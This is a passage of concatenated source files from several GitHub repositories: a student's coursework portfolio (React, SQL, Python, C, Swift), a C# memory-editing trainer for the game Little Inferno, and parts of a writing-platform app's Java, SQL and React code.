Implementing WiFi Connectivity - Lab 5
</Menu.Item>
<Menu.Item key="3" icon={<MenuOutlined/>} onClick={this.handleLab6Click}>
Analog to Digital Converter - Lab 6
</Menu.Item>
</Menu>
</Sider>
<Layout className="site-layout" style={{marginLeft:width}}>
<Header className="site-layout-background" style={{ padding: 0 }}/>
<Content style={{ margin: '0 16px' }}>
{this.state.currentPage === "FinalProject" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Embedded Systems - CPRE 288</Breadcrumb.Item>
<Breadcrumb.Item>Java GUI - Final Project</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "Lab5" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Embedded Systems - CPRE 288</Breadcrumb.Item>
<Breadcrumb.Item>Implementing WiFi Connectivity - Lab 5</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "Lab6" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Embedded Systems - CPRE 288</Breadcrumb.Item>
<Breadcrumb.Item>Analog to Digital Converter - Lab 6</Breadcrumb.Item>
</Breadcrumb>
}
<div className="site-layout-background" style={{ padding: 24, minHeight: 360 }}>
{page}
</div>
</Content>
</Layout>
</Layout>
);
}
}<file_sep>/src/Components/ComS363/querySolutions.sql
-- Q1
select t.retweet_count, t.textbody, t.screen_name, u.category, u.sub_category from tweet t, userAccount u where
t.screen_name = u.screen_name
and t.year = 2016 and t.month = 1
order by t.retweet_count desc limit 10;
-- Q3
select distinct h.hname, count(distinct u.state) as num_states, group_concat(distinct u.state) as states
from tweet t, hashtag h, userAccount u where
h.h_tid = t.tid and t.screen_name = u.screen_name and u.state != "na" and SUBSTRING(t.posted, 1, 4) = 2016
group by h.hname order by num_states desc limit 10;
-- Q6
select x.screen_name, x.state from (select distinct u.screen_name, u.state, u.numFollowers from userAccount u, hashtag h, tweet t where
h.h_tid = t.tid and t.screen_name = u.screen_name and h.hname in ("HappyNewYear","NewYear","NewYears","NewYearsDay")) x
order by x.numFollowers desc limit 10;
-- Q9
SELECT DISTINCT u.screen_name, u.category, u.numFollowers
FROM userAccount u
WHERE u.sub_category = 'GOP'
ORDER BY u.numFollowers DESC
LIMIT 10;
-- Q10
select distinct h.hname, u.state from hashtag h, userAccount u, tweet t where
h.h_tid = t.tid and t.screen_name = u.screen_name and u.state in ("Ohio", "Alaska", "Alabama")
and t.month = 1 and t.year = 2016 order by h.hname asc;
-- Q11
select t.textbody, h.hname, u.screen_name, u.sub_category from tweet t, hashtag h, userAccount u
where h.h_tid = t.tid and t.screen_name = u.screen_name and u.state = 'Ohio' and h.hname = 'Ohio'
and (u.sub_category = "GOP" or u.sub_category = "democrat") and t.month = 1 AND t.year = 2016 limit 10;
-- Q15
SELECT u.screen_name, u.ofstate, GROUP_CONCAT(url.url) Listof_urls
FROM user u, tweets t, url
WHERE u.screen_name = t.posting_user AND url.tid = t.tid AND MONTH(t.posted) = '01' AND YEAR(t.posted) = '2016'AND sub_category = 'GOP'
GROUP BY u.screen_name, u.ofstate limit 100;
-- Q18
select user.screen_name, user.ofstate, group_concat(distinct tweets.posting_user order by tweets.posting_user asc separator ',') as postingUsers
from user
join mentioned on user.screen_name= mentioned.screen_name
join tweets on tweets.tid= mentioned.tid
join user as u on u.screen_name = tweets.posting_user
where u.sub_category= "GOP"
and month(tweets.posted)='01'
and year(tweets.posted) = '2016'
group by user.screen_name, user.ofstate
order by count(tweets.posting_user) desc limit 10;
-- Q23
SELECT DISTINCT h.hastagname, COUNT(h.hastagname) AS cnt
FROM hashtag h
INNER JOIN tweets t ON h.tid = t.tid
INNER JOIN user u ON t.posting_user = u.screen_name
WHERE u.sub_category = 'GOP' and YEAR(t.posted) = '2016' AND MONTH(t.posted) IN ('01','02','03')
GROUP BY h.hastagname
ORDER BY cnt DESC
LIMIT 10;
<file_sep>/src/ClassComponents/ComS311/Project2/q2.py
def longest_common_substring(s1, s2):
"""function to find LCS with loops"""
table = []
count = 0
while count <= len(s1):
count2 = 0
t = []
while count2 <= len(s2):
t.append(None)
count2 += 1
table.append(t)
count += 1
for row in range(len(table)):
for col in range(len(table[row])):
if row == 0 or col == 0:
table[row][col] = 0
elif s1[row - 1] == s2[col - 1]:
table[row][col] = table[row - 1][col - 1] + 1
elif s1[row - 1] != s2[col - 1]:
m = max(table[row][col - 1], table[row - 1][col])
table[row][col] = m
result = findResult(s1, s2, table)
return result
def findResult(s1, s2, table):
"""function that finds result after table is generated"""
result = ""
n = len(s1)
m = len(s2)
while n != 0 and m != 0:
if s1[n - 1] == s2[m - 1]:
result += s1[n - 1]
n = n - 1
m = m - 1
elif s1[n - 1] != s2[m - 1]:
a = table[n - 1][m]
b = table[n][m - 1]
if max(a, b) == a and n != 0:
n = n - 1
elif max(a, b) == b and m != 0:
m = m - 1
result = result[::-1]
return result
s1 = "Look at me, I can fly!"
s2 = "Look at that, it's a fly"
s3 = "abcdefghijklmnopqrstuvwxyz"
s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYS"
s5 = "balderdash!"
s6 = "balderdash!"
s7 = 1500 * 'x'
s8 = 1500 * 'y'
s9 = "them"
s10 = "tim"
s11 = "xyxxzx"
s12 = "zxzyyzxx"
print(longest_common_substring(s7, s8))<file_sep>/src/ClassComponents/CPRE185/Lab7/lab7.c
#include <stdio.h>
#include <math.h>
#define PI 3.141592653589
int scaleRadsForScreen(double rad);
double pitch(double y_mag);
double roll(double x_mag);
int read_acc(double* a_x, double* a_y, double* a_z, int* Button_UP, int* Button_DOWN, int* Button_LEFT, int* Button_RIGHT);
void print_chars(int num, char use);
void graph_line(int number);
int read_acc(double* a_x, double* a_y, double* a_z, int* Button_UP, int* Button_DOWN, int* Button_LEFT, int* Button_RIGHT){
int Button_5;
double slide;
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &*a_x, &*a_y, &*a_z, &*Button_UP, &*Button_DOWN, &*Button_LEFT, &*Button_RIGHT, &Button_5, &slide);
return *Button_LEFT;
}
double roll(double x_mag){
double radians;
if (x_mag >= 1){
x_mag = 1;
}
if (x_mag <= -1){
x_mag = -1;
}
radians = asin(x_mag);
return radians;
}
double pitch(double y_mag){
double radians;
if (y_mag >= 1){
y_mag = 1;
}
if (y_mag <= -1){
y_mag = -1;
}
radians = asin(y_mag);
return radians;
}
int scaleRadsForScreen(double rad){
int screenVal;
screenVal = rad * (78 / PI);
return screenVal;
}
void print_chars(int num, char use){
int i;
for (i = 0; i < num; ++i){
printf("%c", use);
}
return;
}
void graph_line(int number){
int spaces;
if (number >= 0){
print_chars(40, ' ');
print_chars(number, 'R');
print_chars(1, '\n');
}
if (number < 0){
spaces = 40 + number;
print_chars(spaces, ' ');
print_chars(fabs(number), 'L');
print_chars(1, '\n');
}
return;
}
int main(){
double x, y, z;
int b_Up, b_Down, b_Left, b_Right;
double roll_rad, pitch_rad;
int scaled_value;
int value = 0;
int value2 = 0;
while(1){
read_acc(&x, &y, &z, &b_Up, &b_Down, &b_Left, &b_Right);
roll_rad = roll(x);
pitch_rad = pitch(y);
if (b_Left == 1){
value = 1;
value2 = 0;
}
if (value == 1){
scaled_value = scaleRadsForScreen(roll_rad);
graph_line(scaled_value);
}
read_acc(&x, &y, &z, &b_Up, &b_Down, &b_Left, &b_Right);
if (b_Right == 1){
value2 = 1;
value = 0;
}
if (value2 == 1){
scaled_value = scaleRadsForScreen(pitch_rad);
graph_line(scaled_value);
}
if (b_Down == 1){
return 0;
}
fflush(stdout);
}
}<file_sep>/src/ClassComponents/ComS311/Project1/q3.py
from collections import deque
def computation_order(dependencies):
adj_list = adjacency_list(dependencies)
result = None
try: topological_sort(adj_list)
except ValueError: return result
return topological_sort(adj_list)
def topological_sort(graph):
order, enter, state = deque(), set(graph), {}
def dfs(node):
state[node] = 0
for k in graph.get(node, ()):
sk = state.get(k, None)
if sk == 0: raise ValueError(None)
if sk == 1: continue
enter.discard(k)
dfs(k)
order.appendleft(node)
state[node] = 1
while enter: dfs(enter.pop())
sort = []
for x in range(len(order)):
sort.append(order[len(order) - 1 - x])
return sort
def adjacency_list(graph_str):
l = graph_str.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
if int(edges[y].split()[0]) == x:
str = edges[y]
edge = int(str.split()[1])
nodeList.append(edge)
adj.append(nodeList)
adj_dict = {}
for x in range(len(adj)):
adj_dict.update({x:adj[x]})
return adj_dict
str1 = "D 5\n0 3\n3 1\n1 4\n4 2"
str2 = "D 2\n0 1"
str3 = "D 3\n1 2\n0 2"
str4 = "D 3"
str5 = "D 5\n2 3\n3 2"
print computation_order(str5)<file_sep>/src/ClassComponents/CPRE288/FinalProject/FinalProject.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import finalProjectGP1 from './finalProjectGP1.png';
import finalProjectGP2 from './finalProjectGP2.png';
import finalProjectGUIMain from './finalProjectGUIMain.png';
import Graph from './Graph.png';
import GraphPanel from './GraphPanel.java';
import GuiMain from './GuiMain.java';
const Title = Typography.Title;
export default class FinalProject extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Java GUI - Final Project</Title>
<Title level={4}>Technology: Java, C, Eclipse</Title>
For this project, I was in a team of three others. We were tasked with programming the robot
using embedded systems techniques to be controlled remotely using a WiFi connection from
the robot to a lab computer. We needed to write a program to remotely navigate it around
an obstacle course to a final destination without directly seeing the robot. My responsibility
was to create a java program that would take the data from the optical sensors and display
it in a radial graph to detect objects.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>
This graph is made from test data and shows two objects in front of the robot. The red line represents data from
the ultrasonic sensor and the blue line (under the red line) represents data from the infrared sensor
</Title>
<img width='100%' src={Graph} alt=''/>
<Title level={4}>GuiMain.java (click on image to download file)</Title>
<a href={GuiMain} download="GUIMain.java">
<img width='100%' src={finalProjectGUIMain} alt=''/>
</a>
<Title level={4}>GraphPanel.java (click on image to download file)</Title>
<a href={GraphPanel} download="GraphPanel.java">
<img width='100%' src={finalProjectGP1} alt=''/>
<img width='100%' src={finalProjectGP2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/CPRE185/Lab8/Lab8.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import G3shortlong from './G3shortlong.PNG';
import lab8C from './lab8.c';
import ProjectFiles from './Lab8.zip';
import lab8SS1 from './lab8SS1.png';
import lab8SS2 from './lab8SS2.png';
const Title = Typography.Title;
export default class Lab8 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Moving Averages with Accelerometer - Lab 8</Title>
<Title level={4}>Technology: C, Arduino Esplora</Title>
For this lab, we had to print a moving average of the Arduino Esplora's accelerometer
values. It also output the maximum and minimum values of the buffer array
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab8.c (click on image to download file)</Title>
<a href={lab8C} download="lab6.c">
<img width='100%' src={lab8SS1} alt=''/>
<img width='100%' src={lab8SS2} alt=''/>
</a>
<Title level={4}>
Example Output (You can see how the data is "smoothed" out with the moving averages):<br></br>
Y-axis = accelerometer data in g's<br></br>
X-axis = time in milliseconds
</Title>
<img width='100%' src={G3shortlong} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A2/FootballGameTest.java
package hw2;
import hw2.FootballGame;
public class FootballGameTest {
public static void main(String[] args){
FootballGame game = new FootballGame();
game.runOrPass(1);
game.runOrPass(80);
game.runOrPass(1);
game.runOrPass(10);
game.runOrPass(5);
System.out.println(game.getOffense());
System.out.println(game.getScore(0));
System.out.println(game.getScore(1));
System.out.println(game.getDown());
}
}
<file_sep>/src/Components/WorkoutTracker/DetailsViewController.swift
//
// DetailsViewController.swift
// WorkoutTracker
//
// Created by <NAME> on 1/23/20.
// Copyright © 2020 <NAME>. All rights reserved.
//
import UIKit
class DetailsViewController: UIViewController, UITableViewDelegate, UITableViewDataSource {
var list: [String] = []
override func viewDidLoad() {
super.viewDidLoad()
let exercises = Variables.exercises
let sets = Variables.sets
let lenE = exercises!.count - 1
//Loops through the exercises
for i in 0...lenE{
var eStr = exercises![i]["name"].string! + "\n\n"
let outerEID = exercises![i]["e_id"].intValue
let lenS = sets!.count - 1
//Loops through the sets and finds those belonging to current exercise
for j in 0...lenS {
let currentSet = sets![j]
// Found relevant exercise
if currentSet["e_id"].intValue == outerEID {
eStr += "Set " + String(currentSet["orderNum"].intValue) + ":\n"
eStr += " Reps: " + String(currentSet["reps"].intValue)
eStr += " Weight: " + String(currentSet["weight"].intValue) + "\n"
}
}
list.append(eStr)
}
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return(list.count)
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
let cell = tableView.dequeueReusableCell(withIdentifier: "DetailsTableViewCell", for: indexPath) as? DetailsTableViewCell
cell!.testLabel.text = list[list.count - indexPath.row - 1]
tableView.rowHeight = UITableView.automaticDimension
tableView.estimatedRowHeight = 600
return cell!
}
}
<file_sep>/src/Components/WorkoutApp/Exercise.swift
//
// File.swift
// workoutApp
//
// Created by <NAME> on 1/7/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class Exercise {
private var name: String
private var reps: [Int] = []
private var weight: [Int] = []
init?(name: String, reps: [Int], weight: [Int]){
if name == ""{
return nil
}
self.name = name
self.reps = reps
self.weight = weight
}
func showName() -> String {
return name
}
func showReps() -> [Int] {
return reps
}
func showWeight() -> [Int] {
return weight
}
}
<file_sep>/src/ClassComponents/CPRE185/Lab9/lab9.c
// WII-MAZE Skeleton code written by <NAME> 2007
// Edited for ncurses 2008 <NAME>
//Updated for Esplora 2013 TeamRursch185
// Headers
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <ncurses/ncurses.h>
#include <unistd.h>
#include <time.h>
// Mathematical constants
#define PI 3.14159
// Screen geometry
// Use ROWS and COLUMNS for the screen height and width (set by system)
// MAXIMUMS
#define COLUMNS 100
#define ROWS 80
// Character definitions taken from the ASCII table
#define AVATAR 'A'
#define WALL '*'
#define EMPTY_SPACE ' '
// Number of samples taken to form an average for the accelerometer data
// Feel free to tweak this. You may actually want to use the moving averages
// code you created last week
#define NUM_SAMPLES 10
// PRE: 0 < x < COLUMNS, 0 < y < ROWS, 0 < use < 255
// POST: Draws character use to the screen and position x,y
void draw_character(int x, int y, char use);
// 2D character array which the maze is mapped into
char MAZE[COLUMNS][ROWS];
// POST: Generates a random maze structure into MAZE[][]
//You will want to use the rand() function and maybe use the output %100.
//You will have to use the argument to the command line to determine how
//difficult the maze is (how many maze characters are on the screen).
void generate_maze(int difficulty);
void generate_maze(int difficulty){
int i, a, num;
for(i = 0; i < COLUMNS; ++i){
for(a = 0; a < ROWS; ++a){
num = rand() % 100;
if (num < difficulty){
MAZE[i][a] = WALL;
}
else{
MAZE[i][a] = EMPTY_SPACE;
}
}
}
}
// PRE: MAZE[][] has been initialized by generate_maze()
// POST: Draws the maze to the screen
void draw_maze(void);
void draw_maze(void){
char character;
int i, a;
for(i = 0; i < COLUMNS; ++i){
for(a = 0; a < ROWS; ++a){
character = MAZE[i][a];
draw_character(i, a, character);
}
}
}
// PRE: -1.0 < y_mag < 1.0
// POST: Returns tilt magnitude scaled to -1.0 -> 1.0
// You may want to reuse the pitch function written in previous labs.
float calc_roll(float x_mag);
float calc_roll(float x_mag){
if (x_mag >= 1){
x_mag = 1;
}
if (x_mag <= -1){
x_mag = -1;
}
return x_mag;
}
// Main - Run with './explore.exe -t -a -b' piped into STDIN
void main(int argc, char* argv[])
{
int t;
int difficulty = 0;
int i, a;
int y = 0;
int n = 0;
char previous;
float ax, ay, az;
int x = 50;
int previousT = 0;
srand(time(NULL));
sscanf(argv[1], "%d", &difficulty);
// setup screen
initscr();
refresh();
generate_maze(difficulty);
draw_maze();
draw_character(50, 0, AVATAR);
while(y < 79){
scanf("%d, %f, %f, %f", &t, &ax, &ay, &az);
ax = calc_roll(ax);
if ((t - previousT) > 100){
previousT = t;
if (y <= 0){
draw_character(50, 0, EMPTY_SPACE);
}
else{
previous = MAZE[50][y - 1];
draw_character(50, (y - 1), previous);
}
draw_character(50, y, AVATAR);
++y;
}
/*
if ((t % 200) <= 2){
if (MAZE[x][y + 1] == ' '){
++y;
draw_character(x, y, AVATAR);
if (y <= 0){
draw_character(50, 0, EMPTY_SPACE);
}
else{
draw_character(x, (y - 1), EMPTY_SPACE);
}
}
if ((MAZE[x + 1][y] == ' ') && (ax > .3)){
++x;
draw_character(x, y, AVATAR);
draw_character((x - 1), y, ' ');
}
if ((MAZE[x - 1][y] == ' ') && (ax < -.3)){
--x;
draw_character(x, y, AVATAR);
draw_character((x + 1), y, ' ');
}
}
*/
}
printf("\n");
printf("\nYOU WIN!\n");
while(1);
}
// PRE: 0 < x < COLUMNS, 0 < y < ROWS, 0 < use < 255
// POST: Draws character use to the screen and position x,y
//THIS CODE FUNCTIONS FOR PLACING THE AVATAR AS PROVIDED.
//YOU DO NOT NEED TO CHANGE THIS FUNCTION.
void draw_character(int x, int y, char use)
{
mvaddch(y,x,use);
refresh();
}
<file_sep>/src/ClassComponents/ComS311/Project1/q5.py
def maximum_energy(city_map, depot_position):
adj = adj_list(city_map)
for x in range(len(adj)):
if adj[x] == [] and x == depot_position:
return 0
distance = dijkstra(adj, depot_position)
largest = 0
for x in distance:
if x > largest and x != float('inf'):
largest = x
return largest * 2
def dijkstra(adj_list, start):
n = len(adj_list)
in_tree = []
distance = []
parent = []
for x in range(n):
in_tree.append(False)
distance.append(float('inf'))
parent.append(None)
distance[start] = 0
while all(in_tree) == False:
u = next_vertex(in_tree, distance)
in_tree[u] = True
for v, weight in adj_list[u]:
if (not in_tree[v]) and (distance[u] + weight < distance[v]):
distance[v] = distance[u] + weight
parent[v] = u
return distance
def next_vertex(in_tree, distance):
false_indexes = []
count = 0
for x in in_tree:
if x == False:
false_indexes.append(count)
count += 1
smallest = distance[false_indexes[0]]
smallest_index = false_indexes[0]
for x in false_indexes:
current = distance[x]
if current < smallest:
smallest = current
smallest_index = x
return smallest_index
def adj_list(graph):
l = graph.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
data = edges[y].split()
if int(data[0]) == x:
edge = (int(data[1]), int(data[2]))
nodeList.append(edge)
if int(data[1]) == x:
edge = (int(data[0]), int(data[2]))
nodeList.append(edge)
adj.append(nodeList)
return adj
str1 = "U 4 W\n0 2 5\n0 3 2\n3 2 2"
str2 = "U 5 W\n0 1 1\n0 3 3\n1 3 4\n1 4 1\n1 2 2\n4 3 2\n4 2 3"
str3 = "U 7 W\n0 1 6\n1 2 6\n0 2 10\n0 3 3\n3 4 3\n4 5 1"
print maximum_energy(str3, 0)
|
7b25953f5459bcaec392b5af5ca381f84faa13fb
|
[
"SQL",
"JavaScript",
"Swift",
"Java",
"Python",
"C"
] | 75
|
JavaScript
|
balex654/Portfolio
|
d3f88f17f007621fb8efe90ee83d1924032fda8d
|
3f0baba700f76320e90fcf91ec2316081c902be0
|
refs/heads/master
|
<repo_name>mikeatlantis/Little-inferno-Trainer-Source-code<file_sep>/README.md
# Little-inferno-Trainer-Source-code<file_sep>/Little Inferno.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using Memory;
namespace DataBase
{
public partial class Form2 : MetroFramework.Forms.MetroForm
{
public Form2()
{
InitializeComponent();
}
public Mem MemLib = new Mem();
int gameProcId;
private void Form2_Load(object sender, EventArgs e)
{
}
private void metroTextBox1_Click(object sender, EventArgs e)
{
}
private void metroLabel2_Click(object sender, EventArgs e)
{
}
private void metroButton1_Click(object sender, EventArgs e)
{
if(gameProcId > 0)
{
MemLib.writeMemory("Little Inferno.exe+0x0041FF00,0x30,0x4,0x158,0x0,0x20", "int", metroTextBox1.Text);
}
else
{
MessageBox.Show("There was a problem Handeling your Request, Please Contact the Creator of the trainer");
}
}
private void timer1_Tick(object sender, EventArgs e)
{
}
private void metroButton3_Click(object sender, EventArgs e)
{
gameProcId = MemLib.getProcIDFromName("Little Inferno");
if (gameProcId != 0)
{
metroLabel6.Text = gameProcId.ToString();
MemLib.OpenGameProcess(gameProcId);
metroLabel4.Text = "Game Found!";
metroLabel4.Style = MetroFramework.MetroColorStyle.Green;
metroTextBox1.Enabled = true;
metroTextBox2.Enabled = true;
metroButton1.Enabled = true;
metroButton2.Enabled = true;
metroButton3.Enabled = false;
}
else
{
MessageBox.Show("Error Game Must Be Running First");
}
}
private void metroButton2_Click(object sender, EventArgs e)
{
if(gameProcId > 0)
{
MemLib.writeMemory("Little Inferno.exe+0041FF00,0x30,0x4,0x158,0x0,0x24", "int", metroTextBox2.Text);
}
}
}
}
|
2b37215cba747d7d2aadf431239e3377ee165242
|
[
"Markdown",
"C#"
] | 2
|
Markdown
|
mikeatlantis/Little-inferno-Trainer-Source-code
|
2225348b4607f30d2c125b16029a731ee747d6e7
|
11501752f7b26f0c2beaca4719862a078a7ac296
|
refs/heads/main
|
<file_sep>package com.writerskalice.server.models.postmodels;
import lombok.AllArgsConstructor;
import lombok.Data;
import lombok.NoArgsConstructor;
import java.util.ArrayList;
@Data
@NoArgsConstructor
@AllArgsConstructor
public class CreateUserProfileData {
private String username;
private String password;
private String name;
private String email;
private String bio;
private Boolean isAboveEighteen;
private Boolean showInterestTags;
private Boolean showName;
private Boolean showBio;
private ArrayList<Integer> tags;
}
<file_sep>-- Gets a post: /posts/getpost
-- 1. Get everything except the tags
select post_id, title, content, n_pos_rcn, n_neg_rcn, n_comments, anonymous, postedby_username, posted_date from getpost_view_com_rcn_int
where post_id = 101;
-- 2. Get the tags
select it.description as interest from post_interests left join interest_tags it on post_interests.interest_id = it.interest_id
where post_interests.post_id = 101;
-- OR USE VIEW:
select description as interest from posts_get_interest_tags where post_id = 101;
-- Gets the comments on a post /posts/getcomments
select content, user_id, anonymous from post_comments pc left join comments c on c.comment_id = pc.comment_id
where post_id = 101;
-- use the uid from the prev query here to get the postedbyUsername:
select username as postedby_username from users_table where user_id = 1;
-- OR USE THE VIEW (single query) instead of above 2:
select content, postedby_username, anonymous from get_comments where post_id = 101;
-- Gets the data required for author display
select name, username, rank_id, rank_desc, num_stars, about_me as bio, show_name, show_bio, show_interests from profile_display
where user_id = 101;
-- Gets the data for the profile settings page
select name, about_me as bio, rank_id, rank_desc, num_stars, show_name, show_bio, show_interests from profile_display where user_id = 101;
select email from user_email_ids where user_id = 101;
select is_above_eighteen from profiles where user_id = 101;
-- Gets the view request details
-- 1. Get everything except the tags
select vr.post_id as post_id, title, content, n_pos_rcn, n_neg_rcn, n_comments, anonymous, postedby_username, posted_date, from_user_id, sent_date_time from view_requests as vr
left join getpost_view_com_rcn_int gvcri on vr.post_id = gvcri.post_id
where vr.from_user_id = 101; -- enter current user id
-- 2. Get the tags (loop for each of the posts)
select it.description as interest from post_interests left join interest_tags it on post_interests.interest_id = it.interest_id
where post_interests.post_id = 101;
-- OR USE VIEW:
select description as interest from posts_get_interest_tags where post_id = 101;<file_sep>import React from 'react';
import logo from './public/assets/logo.png';
import './css/build/tailwind.css';
import PopupMenuList from './PopupMenuList';
import Chip from '@material-ui/core/Chip';
import serverUrl from './appconfig';
import { Link } from 'react-router-dom';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
import Post from './Post';
import InterestChip from './InterestChip';
import { tagToId } from './utils';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export default class NewPostPage extends React.Component {
constructor(props) {
super(props);
this.state = {
interestTags: [],
title: '',
content: '',
anonymous: false,
above_eighteen: false,
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleProfileSettings = this.handleProfileSettings.bind(this);
this.handleLogout = this.handleLogout.bind(this);
this.handleVR = this.handleVR.bind(this);
this.handlePost = this.handlePost.bind(this);
this.handleOptions = this.handleOptions.bind(this);
}
handleOptions(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
addTag(interest) {
console.log(this.state.interestTags);
this.setState(state => {
const interestTags = state.interestTags.concat(interest);
return {
interestTags: interestTags
};
});
}
removeTag(interest) {
console.log(this.state.interestTags);
function arrayRemove(arr, value) {
return arr.filter(function (elem) {
return elem != value;
});
}
this.setState(state => ({
interestTags: arrayRemove(state.interestTags, interest)
}));
}
handleProfileSettings() {
console.log("Profile Settings");
}
handleLogout() {
console.log("Logout");
}
handleVR() {
console.log("View requests");
}
handlePost() {
if (!this.state.title || !this.state.content) {
this.setState({
errorText: 'A blank post? Really?',
failedSnkOpen: true,
});
return;
}
// send post
fetch(serverUrl + "/posts/createpost", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
title: this.state.title,
content: this.state.content,
isAboveEighteen: this.state.above_eighteen,
anonymous: this.state.anonymous,
postedbyUid: window.localStorage.getItem("wKuid"),
tags: this.state.interestTags.map((tag) => tagToId(tag)),
})
}).then((respone) => {
if (respone.ok) {
this.setState({
successText: 'Posted!',
successSnkOpen: true,
});
window.setTimeout(() => this.props.history.push('/feed'), 1000);
}
else {
this.setState({
errorText: 'Could not post!',
failedSnkOpen: true,
});
}
});
}
render() {
return (
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div className="flex items-center justify-between h-16">
<div className="flex items-center">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden md:block">
<div className="ml-10 flex items-baseline space-x-4">
<Link to="/feed">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
</Link>
<Link to="/savedPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Saved Posts</a>
</Link>
<Link to="/seenPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Seen Posts</a>
</Link>
</div>
</div>
</div>
<div className="hidden md:block">
<div className="ml-4 flex items-center md:ml-6">
{/*<button
className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700"
aria-label="Notifications">
<svg className="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M15 17h5l-1.405-1.405A2.032 2.032 0 0118 14.158V11a6.002 6.002 0 00-4-5.659V5a2 2 0 10-4 0v.341C7.67 6.165 6 8.388 6 11v3.159c0 .538-.214 1.055-.595 1.436L4 17h5m6 0v1a3 3 0 11-6 0v-1m6 0H9" />
</svg>
</button>*/}
{/* Profile dropdown */}
<div className="ml-3 mt-1 relative">
<PopupMenuList name='User' onLogout={this.handleLogout} onVR={this.handleVR} onProfile={this.handleProfileSettings} />
</div>
</div>
</div>
<div className="-mr-2 flex md:hidden">
{/* Mobile menu button */}
<button
className="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:bg-gray-700 focus:text-white">
{/* Menu open: "hidden", Menu closed: "block" */}
<svg className="block h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M4 6h16M4 12h16M4 18h16" />
</svg>
{/* Menu open: "block", Menu closed: "hidden" */}
<svg className="hidden h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M6 18L18 6M6 6l12 12" />
</svg>
</button>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Open: "block", closed: "hidden"
*/}
<div className='hidden'>
<div className="px-2 pt-2 pb-3 space-y-1 sm:px-3">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-white bg-gray-900 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Team</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Projects</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Calendar</a>
<a href="#"
